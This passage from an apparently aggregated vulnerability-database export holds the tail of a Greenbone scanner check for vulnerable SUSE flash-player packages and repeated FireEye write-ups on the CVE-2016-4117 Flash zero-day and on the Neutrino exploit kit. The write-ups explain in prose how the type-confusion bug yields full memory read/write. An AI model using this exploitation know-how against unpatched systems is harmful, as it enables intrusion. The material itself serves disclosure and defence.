\"CVE-2016-1022\", \"CVE-2016-1023\", \"CVE-2016-1024\", \"CVE-2016-1025\",\n \"CVE-2016-1026\", \"CVE-2016-1027\", \"CVE-2016-1028\", \"CVE-2016-1029\",\n \"CVE-2016-1030\", \"CVE-2016-1031\", \"CVE-2016-1032\", \"CVE-2016-1033\",\n \"CVE-2016-1096\", \"CVE-2016-1097\", \"CVE-2016-1098\", \"CVE-2016-1099\",\n \"CVE-2016-1100\", \"CVE-2016-1101\", \"CVE-2016-1102\", \"CVE-2016-1103\",\n \"CVE-2016-1104\", \"CVE-2016-1105\", \"CVE-2016-1106\", \"CVE-2016-1107\",\n \"CVE-2016-1108\", \"CVE-2016-1109\", \"CVE-2016-1110\", \"CVE-2016-4108\",\n \"CVE-2016-4109\", \"CVE-2016-4110\", \"CVE-2016-4111\", \"CVE-2016-4112\",\n \"CVE-2016-4113\", \"CVE-2016-4114\", \"CVE-2016-4115\", \"CVE-2016-4116\",\n \"CVE-2016-4117\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for flash-player (SUSE-SU-2016:1305-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'flash-player'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for flash-player fixes the following issues:\n\n - Security update to 11.2.202.621 (bsc#979422):\n\n * APSA16-02, APSB16-15, CVE-2016-1096, CVE-2016-1097, CVE-2016-1098,\n CVE-2016-1099, CVE-2016-1100, CVE-2016-1101, CVE-2016-1102,\n CVE-2016-1103, CVE-2016-1104, CVE-2016-1105, CVE-2016-1106,\n CVE-2016-1107, CVE-2016-1108, CVE-2016-1109, CVE-2016-1110,\n CVE-2016-4108, CVE-2016-4109, CVE-2016-4110, CVE-2016-4111,\n CVE-2016-4112, CVE-2016-4113, CVE-2016-4114, CVE-2016-4115,\n CVE-2016-4116, CVE-2016-4117\n\n - The following CVEs got fixed during the previous release, but got\n published afterwards:\n\n * APSA16-01, APSB16-10, CVE-2016-1006, CVE-2016-1011, CVE-2016-1012,\n CVE-2016-1013, CVE-2016-1014, CVE-2016-1015, CVE-2016-1016,\n CVE-2016-1017, CVE-2016-1018, CVE-2016-1019, CVE-2016-1020,\n CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024,\n CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028,\n CVE-2016-1029, CVE-2016-1030, CVE-2016-1031, CVE-2016-1032,\n CVE-2016-1033\");\n\n script_tag(name:\"affected\", value:\"flash-player on SUSE Linux Enterprise Desktop 12\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"SUSE-SU\", value:\"2016:1305-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=SLED12\\.0SP0\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLED12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~11.2.202.621~130.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"flash-player-gnome\", rpm:\"flash-player-gnome~11.2.202.621~130.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "fireeye": [{"lastseen": "2017-11-17T14:44:06", "description": "On May 8, 2016, FireEye detected an attack exploiting a previously unknown vulnerability in Adobe Flash Player (CVE-2016-4117) and reported the issue to the Adobe Product Security Incident Response Team (PSIRT). Adobe released a patch for the vulnerability in [APSB16-15](<https://helpx.adobe.com/security/products/flash-player/apsb16-15.html>) just four days later.\n\nAttackers had embedded the Flash exploit inside a Microsoft Office document, which they then hosted on their web server, and used a Dynamic DNS (DDNS) domain to reference the document and payload. With this configuration, the attackers could disseminate their exploit via URL or email attachment. Although this vulnerability resides within Adobe Flash Player, threat actors designed this particular attack for a target running Windows and Microsoft Office.\n\n### Attack Summary\n\nUpon opening the document, the exploit downloads and executes a payload from the attacker\u2019s server. To avoid suspicion, the attacker then shows the victim a decoy document. The full exploit chain proceeds as follows:\n\n 1. The victim opens the malicious Office document. \n 1. The Office document renders an embedded Flash file. \n 1. If the Flash Player version is older than 21.0.0.196, the attack aborts.\n 2. Otherwise, the attack runs the encoded Flash exploit.\n 2. The exploit runs embedded native shellcode. \n 1. The shellcode downloads and executes a second shellcode from the attacker\u2019s server.\n 3. The second shellcode: \n 1. Downloads and executes malware.\n 2. Downloads and displays a decoy document.\n 4. The malware connects to a second server for command and control (C2) and waits for further instructions.\n\nThis process is shown in Figure 1.\n\n\n\nFigure 1 Attack flow chart\n\n### CVE-2016-4117 Exploitation Details\n\nAn out-of-bound read vulnerability exists in the com.adobe.tvsdk.mediacore.timeline.operations. DeleteRangeTimelineOperation module. By extending the DeleteRangeTimelineOperation class, one can define a property that conflicts with the inner interface name. In this exploit, the author chose \u201cplacement\u201d as the property name, as shown in Figure 2. Referencing the interface causes the ActionScript Virtual Machine to call the internal function getBinding to get a bind id. Because the \u201cplacement\u201d property conflicts with the \u201cplacement\u201d interface name, the attacker can manipulate the bind id, and ultimately induce type confusion.\n\n\n\nFigure 2 Placement interface vs. class definition\n\n### Memory layout\n\nBefore triggering the vulnerability, the exploit defines an object that extends ByteArray. The definition is modified to contain easily distinguishable values that aid in locating objects in memory. Then, the exploit allocates a set of these objects to control the memory layout (Figure 3). \n\n \n \nFigure 3 Prepare heap memory layout\n\nThese objects look as follows when in memory:\n\n\n\nThe exploit then uses the type-confused DeleteRangeTimelineOperation object to read out of bounds and find one of the extended ByteArray objects based upon looking for the pre-defined property values (shown in Figure 4), and manipulates the data buffer pointer to an attacker-controlled area.\n\n\n\nFigure 4 Finding target ByteArray\n\nWith the ability to read and write individual values in the extended ByteArray object, the attacker can corrupt one of the objects to extend its length to 0xffffffff, and its data buffer to address 0. Future reads and writes to the corrupted ByteArray may then access all of the user space memory (Figure 5).\n\n\n\nFigure 5 RW primitive and execute shellcode\n\n### Code execution\n\nOnce the exploit can read and write arbitrarily in memory, it executes embedded shellcode. The shellcode downloads a second stage of shellcode from the attacker\u2019s server, which then downloads and executes the malware payload and displays the decoy document.\n\n### Conclusion\n\nCVE-2016-4117 was recently exploited in targeted attacks. Just four days after notification, Adobe released a security update for Flash Player that patched the underlying vulnerability. Users who require Flash Player in their environment should download this timely patch to protect their systems from exploitation. Additionally, Flash Player users could consider employing additional mitigations, such as EMET from Microsoft, to make their systems more difficult and costly to exploit.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-05-13T20:00:00", "type": "fireeye", "title": "CVE-2016-4117: Flash Zero-Day Exploited in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4117"], "modified": "2016-05-13T20:00:00", "id": "FIREEYE:529A9C9970A2887D6BB05A18FF5EB97C", "href": "https://www.fireeye.com/blog/threat-research/2016/05/cve-2016-4117-flash-zero-day.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-11-04T00:25:37", "description": "On May 8, 2016, FireEye detected an attack exploiting a previously unknown vulnerability in Adobe Flash Player (CVE-2016-4117) and reported the issue to the Adobe Product Security Incident Response Team (PSIRT). Adobe released a patch for the vulnerability in [APSB16-15](<https://helpx.adobe.com/security/products/flash-player/apsb16-15.html>) just four days later.\n\nAttackers had embedded the Flash exploit inside a Microsoft Office document, which they then hosted on their web server, and used a Dynamic DNS (DDNS) domain to reference the document and payload. With this configuration, the attackers could disseminate their exploit via URL or email attachment. Although this vulnerability resides within Adobe Flash Player, threat actors designed this particular attack for a target running Windows and Microsoft Office.\n\n### Attack Summary\n\nUpon opening the document, the exploit downloads and executes a payload from the attacker\u2019s server. To avoid suspicion, the attacker then shows the victim a decoy document. The full exploit chain proceeds as follows:\n\n 1. The victim opens the malicious Office document. \n 1. The Office document renders an embedded Flash file. \n 1. If the Flash Player version is older than 21.0.0.196, the attack aborts.\n 2. Otherwise, the attack runs the encoded Flash exploit.\n 2. The exploit runs embedded native shellcode. \n 1. The shellcode downloads and executes a second shellcode from the attacker\u2019s server.\n 3. The second shellcode: \n 1. Downloads and executes malware.\n 2. Downloads and displays a decoy document.\n 4. The malware connects to a second server for command and control (C2) and waits for further instructions.\n\nThis process is shown in Figure 1.\n\n\n\nFigure 1 Attack flow chart\n\n### CVE-2016-4117 Exploitation Details\n\nAn out-of-bound read vulnerability exists in the com.adobe.tvsdk.mediacore.timeline.operations. DeleteRangeTimelineOperation module. By extending the DeleteRangeTimelineOperation class, one can define a property that conflicts with the inner interface name. In this exploit, the author chose \u201cplacement\u201d as the property name, as shown in Figure 2. Referencing the interface causes the ActionScript Virtual Machine to call the internal function getBinding to get a bind id. Because the \u201cplacement\u201d property conflicts with the \u201cplacement\u201d interface name, the attacker can manipulate the bind id, and ultimately induce type confusion.\n\n\n\nFigure 2 Placement interface vs. class definition\n\n### Memory layout\n\nBefore triggering the vulnerability, the exploit defines an object that extends ByteArray. The definition is modified to contain easily distinguishable values that aid in locating objects in memory. Then, the exploit allocates a set of these objects to control the memory layout (Figure 3). \n\n \n \nFigure 3 Prepare heap memory layout\n\nThese objects look as follows when in memory:\n\n\n\nThe exploit then uses the type-confused DeleteRangeTimelineOperation object to read out of bounds and find one of the extended ByteArray objects based upon looking for the pre-defined property values (shown in Figure 4), and manipulates the data buffer pointer to an attacker-controlled area.\n\n\n\nFigure 4 Finding target ByteArray\n\nWith the ability to read and write individual values in the extended ByteArray object, the attacker can corrupt one of the objects to extend its length to 0xffffffff, and its data buffer to address 0. Future reads and writes to the corrupted ByteArray may then access all of the user space memory (Figure 5).\n\n\n\nFigure 5 RW primitive and execute shellcode\n\n### Code execution\n\nOnce the exploit can read and write arbitrarily in memory, it executes embedded shellcode. The shellcode downloads a second stage of shellcode from the attacker\u2019s server, which then downloads and executes the malware payload and displays the decoy document.\n\n### Conclusion\n\nCVE-2016-4117 was recently exploited in targeted attacks. Just four days after notification, Adobe released a security update for Flash Player that patched the underlying vulnerability. Users who require Flash Player in their environment should download this timely patch to protect their systems from exploitation. Additionally, Flash Player users could consider employing additional mitigations, such as EMET from Microsoft, to make their systems more difficult and costly to exploit.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-05-14T00:00:00", "type": "fireeye", "title": "CVE-2016-4117: Flash Zero-Day Exploited in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4117"], "modified": "2016-05-14T00:00:00", "id": "FIREEYE:FE931C46CDF99DA3A4567E123E342C99", "href": "https://www.fireeye.com/blog/threat-research/2016/05/cve-2016-4117-flash-zero-day.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-03-07T16:24:19", "description": "On May 8, 2016, FireEye detected an attack exploiting a previously unknown vulnerability in Adobe Flash Player (CVE-2016-4117) and reported the issue to the Adobe Product Security Incident Response Team (PSIRT). Adobe released a patch for the vulnerability in [APSB16-15](<https://helpx.adobe.com/security/products/flash-player/apsb16-15.html>) just four days later.\n\nAttackers had embedded the Flash exploit inside a Microsoft Office document, which they then hosted on their web server, and used a Dynamic DNS (DDNS) domain to reference the document and payload. With this configuration, the attackers could disseminate their exploit via URL or email attachment. Although this vulnerability resides within Adobe Flash Player, threat actors designed this particular attack for a target running Windows and Microsoft Office.\n\n### Attack Summary\n\nUpon opening the document, the exploit downloads and executes a payload from the attacker\u2019s server. To avoid suspicion, the attacker then shows the victim a decoy document. The full exploit chain proceeds as follows:\n\n 1. The victim opens the malicious Office document. \n 1. The Office document renders an embedded Flash file. \n 1. If the Flash Player version is older than 21.0.0.196, the attack aborts.\n 2. Otherwise, the attack runs the encoded Flash exploit.\n 2. The exploit runs embedded native shellcode. \n 1. The shellcode downloads and executes a second shellcode from the attacker\u2019s server.\n 3. The second shellcode: \n 1. Downloads and executes malware.\n 2. Downloads and displays a decoy document.\n 4. The malware connects to a second server for command and control (C2) and waits for further instructions.\n\nThis process is shown in Figure 1.\n\n\n\nFigure 1 Attack flow chart\n\n### CVE-2016-4117 Exploitation Details\n\nAn out-of-bound read vulnerability exists in the com.adobe.tvsdk.mediacore.timeline.operations. DeleteRangeTimelineOperation module. By extending the DeleteRangeTimelineOperation class, one can define a property that conflicts with the inner interface name. In this exploit, the author chose \u201cplacement\u201d as the property name, as shown in Figure 2. Referencing the interface causes the ActionScript Virtual Machine to call the internal function getBinding to get a bind id. Because the \u201cplacement\u201d property conflicts with the \u201cplacement\u201d interface name, the attacker can manipulate the bind id, and ultimately induce type confusion.\n\n\n\nFigure 2 Placement interface vs. class definition\n\n### Memory layout\n\nBefore triggering the vulnerability, the exploit defines an object that extends ByteArray. The definition is modified to contain easily distinguishable values that aid in locating objects in memory. Then, the exploit allocates a set of these objects to control the memory layout (Figure 3). \n\n \n \nFigure 3 Prepare heap memory layout\n\nThese objects look as follows when in memory:\n\n\n\nThe exploit then uses the type-confused DeleteRangeTimelineOperation object to read out of bounds and find one of the extended ByteArray objects based upon looking for the pre-defined property values (shown in Figure 4), and manipulates the data buffer pointer to an attacker-controlled area.\n\n\n\nFigure 4 Finding target ByteArray\n\nWith the ability to read and write individual values in the extended ByteArray object, the attacker can corrupt one of the objects to extend its length to 0xffffffff, and its data buffer to address 0. Future reads and writes to the corrupted ByteArray may then access all of the user space memory (Figure 5).\n\n\n\nFigure 5 RW primitive and execute shellcode\n\n### Code execution\n\nOnce the exploit can read and write arbitrarily in memory, it executes embedded shellcode. The shellcode downloads a second stage of shellcode from the attacker\u2019s server, which then downloads and executes the malware payload and displays the decoy document.\n\n### Conclusion\n\nCVE-2016-4117 was recently exploited in targeted attacks. Just four days after notification, Adobe released a security update for Flash Player that patched the underlying vulnerability. Users who require Flash Player in their environment should download this timely patch to protect their systems from exploitation. Additionally, Flash Player users could consider employing additional mitigations, such as EMET from Microsoft, to make their systems more difficult and costly to exploit.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-05-13T20:00:00", "type": "fireeye", "title": "CVE-2016-4117: Flash Zero-Day Exploited in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4117"], "modified": "2016-05-13T20:00:00", "id": "FIREEYE:F598C2CB5A87E8844CDF2684E4B9200D", "href": "https://www.fireeye.com/blog/threat-research/2016/05/cve-2016-4117-flash-zero-day.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-11-04T00:25:29", "description": "A security researcher recently published [source code](<https://github.com/theori-io/cve-2016-0189>) for a working exploit for CVE-2016-0189 and the Neutrino Exploit Kit (EK) quickly adopted it.\n\nCVE-2016-0189 was originally exploited as a zero-day vulnerability in [targeted attacks in Asia](<http://www.symantec.com/connect/blogs/internet-explorer-zero-day-exploit-used-targeted-attacks-south-korea>). The vulnerability resides within scripting engines in Microsoft\u2019s Internet Explorer (IE) browser, and is exploited to achieve Remote Code Execution (RCE). According to the researcher\u2019s repository, the open source exploit affects IE on at least Windows 10. It is possible that attackers could use or repurpose the attack for earlier versions of Windows.\n\nMicrosoft patched [CVE-2016-0189 in May on Patch Tuesday](<https://technet.microsoft.com/en-us/library/security/ms16-may.aspx>). Applying this patch will protect a system from this exploit.\n\n##### Attack Details \n\n\nThe popular Neutrino EK was quick to adopt this exploit. Neutrino works by embedding multiple exploits into one Shockwave Flash (SWF) file. Once run, the SWF profiles the victim\u2019s system \u2013 shown in Figure 1 \u2013 to determine which of its embedded exploits to use.\n\n\n\nFigure 1. Neutrino EK SWF profiles a victim\n\nNext, it decrypts and runs the applicable exploit, as shown in Figure 2. This is different from most other EKs, in which an earlier HTML/JavaScript stage profiles the browser and selectively downloads exploits from the server.\n\n\n\nFigure 2. Decrypt and embed the selected exploit into an iframe\n\nIn this example, Neutrino embedded exploits for five vulnerabilities that have been patched since May or earlier: three for Adobe Flash Player (CVE-2016-4117, CVE-2016-1019, CVE-2015-8651) and two for Internet Explorer (CVE-2016-0189, CVE-2014-6332). CVE-2016-0189 is the newest addition to Neutrino\u2019s arsenal.\n\n##### CVE-2016-0189\n\nThis CVE-2016-0189 vulnerability stems from a failure to put a lock on an array before working on it. This omission can lead to an issue when the array is changed while another function is in the middle of working on it. Memory corruption can occur if the \u201cvalueOf \u201c property of the array is set to a script function that changes the array size, as shown in Figure 3.\n\n\n\nFigure 3. Neutrino setting triggering conditions\n\nAfter Microsoft released the patch, a security researcher compared the original and patched programs to identify the root cause of the vulnerability and create a fully functioning exploit. The exploit embedded within Neutrino is identical to this researcher\u2019s exploit, except for the code that runs after initial control.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-14T20:37:00", "type": "fireeye", "title": "Exploit Kits Quickly Adopt Exploit Thanks to Open Source Release", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6332", "CVE-2015-8651", "CVE-2016-0189", "CVE-2016-1019", "CVE-2016-4117"], "modified": "2016-07-14T20:37:00", "id": "FIREEYE:FAB9D3AA433B8323FF6FA7ABC6AD4069", "href": "https://www.fireeye.com/blog/threat-research/2016/07/exploit_kits_quickly.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-11-17T14:44:04", "description": "A security researcher recently published [source code](<https://github.com/theori-io/cve-2016-0189>) for a working exploit for CVE-2016-0189 and the Neutrino Exploit Kit (EK) quickly adopted it.\n\nCVE-2016-0189 was originally exploited as a zero-day vulnerability in [targeted attacks in Asia](<http://www.symantec.com/connect/blogs/internet-explorer-zero-day-exploit-used-targeted-attacks-south-korea>). The vulnerability resides within scripting engines in Microsoft\u2019s Internet Explorer (IE) browser, and is exploited to achieve Remote Code Execution (RCE). According to the researcher\u2019s repository, the open source exploit affects IE on at least Windows 10. It is possible that attackers could use or repurpose the attack for earlier versions of Windows.\n\nMicrosoft patched [CVE-2016-0189 in May on Patch Tuesday](<https://technet.microsoft.com/en-us/library/security/ms16-may.aspx>). Applying this patch will protect a system from this exploit.\n\n##### Attack Details \n\n\nThe popular Neutrino EK was quick to adopt this exploit. Neutrino works by embedding multiple exploits into one Shockwave Flash (SWF) file. Once run, the SWF profiles the victim\u2019s system \u2013 shown in Figure 1 \u2013 to determine which of its embedded exploits to use.\n\n\n\nFigure 1. Neutrino EK SWF profiles a victim\n\nNext, it decrypts and runs the applicable exploit, as shown in Figure 2. This is different from most other EKs, in which an earlier HTML/JavaScript stage profiles the browser and selectively downloads exploits from the server.\n\n\n\nFigure 2. Decrypt and embed the selected exploit into an iframe\n\nIn this example, Neutrino embedded exploits for five vulnerabilities that have been patched since May or earlier: three for Adobe Flash Player (CVE-2016-4117, CVE-2016-1019, CVE-2015-8651) and two for Internet Explorer (CVE-2016-0189, CVE-2014-6332). CVE-2016-0189 is the newest addition to Neutrino\u2019s arsenal.\n\n##### CVE-2016-0189\n\nThis CVE-2016-0189 vulnerability stems from a failure to put a lock on an array before working on it. This omission can lead to an issue when the array is changed while another function is in the middle of working on it. Memory corruption can occur if the \u201cvalueOf \u201c property of the array is set to a script function that changes the array size, as shown in Figure 3.\n\n\n\nFigure 3. Neutrino setting triggering conditions\n\nAfter Microsoft released the patch, a security researcher compared the original and patched programs to identify the root cause of the vulnerability and create a fully functioning exploit. The exploit embedded within Neutrino is identical to this researcher\u2019s exploit, except for the code that runs after initial control.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-14T16:37:00", "type": "fireeye", "title": "Exploit Kits Quickly Adopt Exploit Thanks to Open Source Release", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1019", "CVE-2014-6332", "CVE-2016-0189", "CVE-2016-4117", "CVE-2015-8651"], "modified": "2016-07-14T16:37:00", "id": "FIREEYE:0A49354849202DA95FE69EEC5811E6DD", "href": "https://www.fireeye.com/blog/threat-research/2016/07/exploit_kits_quickly.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-03-07T16:24:19", "description": "A security researcher recently published [source code](<https://github.com/theori-io/cve-2016-0189>) for a working exploit for CVE-2016-0189 and the Neutrino Exploit Kit (EK) quickly adopted it.\n\nCVE-2016-0189 was originally exploited as a zero-day vulnerability in [targeted attacks in Asia](<http://www.symantec.com/connect/blogs/internet-explorer-zero-day-exploit-used-targeted-attacks-south-korea>). The vulnerability resides within scripting engines in Microsoft\u2019s Internet Explorer (IE) browser, and is exploited to achieve Remote Code Execution (RCE). According to the researcher\u2019s repository, the open source exploit affects IE on at least Windows 10. It is possible that attackers could use or repurpose the attack for earlier versions of Windows.\n\nMicrosoft patched [CVE-2016-0189 in May on Patch Tuesday](<https://technet.microsoft.com/en-us/library/security/ms16-may.aspx>). Applying this patch will protect a system from this exploit.\n\n##### Attack Details \n\n\nThe popular Neutrino EK was quick to adopt this exploit. Neutrino works by embedding multiple exploits into one Shockwave Flash (SWF) file. Once run, the SWF profiles the victim\u2019s system \u2013 shown in Figure 1 \u2013 to determine which of its embedded exploits to use.\n\n\n\nFigure 1. Neutrino EK SWF profiles a victim\n\nNext, it decrypts and runs the applicable exploit, as shown in Figure 2. This is different from most other EKs, in which an earlier HTML/JavaScript stage profiles the browser and selectively downloads exploits from the server.\n\n\n\nFigure 2. Decrypt and embed the selected exploit into an iframe\n\nIn this example, Neutrino embedded exploits for five vulnerabilities that have been patched since May or earlier: three for Adobe Flash Player (CVE-2016-4117, CVE-2016-1019, CVE-2015-8651) and two for Internet Explorer (CVE-2016-0189, CVE-2014-6332). CVE-2016-0189 is the newest addition to Neutrino\u2019s arsenal.\n\n##### CVE-2016-0189\n\nThis CVE-2016-0189 vulnerability stems from a failure to put a lock on an array before working on it. This omission can lead to an issue when the array is changed while another function is in the middle of working on it. Memory corruption can occur if the \u201cvalueOf \u201c property of the array is set to a script function that changes the array size, as shown in Figure 3.\n\n\n\nFigure 3. Neutrino setting triggering conditions\n\nAfter Microsoft released the patch, a security researcher compared the original and patched programs to identify the root cause of the vulnerability and create a fully functioning exploit. The exploit embedded within Neutrino is identical to this researcher\u2019s exploit, except for the code that runs after initial control.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-14T16:37:00", "type": "fireeye", "title": "Exploit Kits Quickly Adopt Exploit Thanks to Open Source Release", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1019", "CVE-2014-6332", "CVE-2016-0189", "CVE-2016-4117", "CVE-2015-8651"], "modified": "2016-07-14T16:37:00", "id": "FIREEYE:94FA42F08227BCEDB46BD7010CC3A45D", "href": "https://www.fireeye.com/blog/threat-research/2016/07/exploit_kits_quickly.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "attackerkb": [{"lastseen": "2022-05-13T02:37:51", "description": "Adobe Flash Player 21.0.0.226 and earlier allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in May 2016.\n\n \n**Recent assessments:** \n 